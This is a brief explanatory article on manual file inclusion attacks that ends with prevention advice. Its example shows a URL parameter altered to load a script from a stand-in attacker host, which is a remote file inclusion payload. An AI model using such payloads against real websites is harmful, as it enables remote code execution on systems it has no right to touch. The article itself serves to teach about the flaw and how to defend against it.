What is Manual File Inclusion?

Manual file inclusion involves exploiting file inclusion vulnerabilities by manually manipulating variables that reference files. This can be done by modifying the URL or by using tools such as Burp Suite to intercept and modify requests. This type of attack can lead to information disclosure, privilege escalation, or even remote code execution if files with sensitive data or functionality are accessed.

Manual File Inclusion Example

Here is a simple example of a manual file inclusion attack:

             // Original URL
             http://example.com/view?file=example.php
     
             // Modified URL
             http://example.com/view?file=http://attacker.com/malicious-script.php
             

In this example, the attacker modifies the "file" parameter in the URL to reference a malicious script hosted on their own server.

Prevention

Preventing manual file inclusion attacks involves proper input validation and sanitization. This includes:

• Input validation: Validate user input by only accepting expected values.
• Use allow lists: Only allow known good input to pass through.
• Sanitize input: Remove or replace special characters from user input.
• Limit file permissions: Limit the permissions of the web server user to only what is necessary.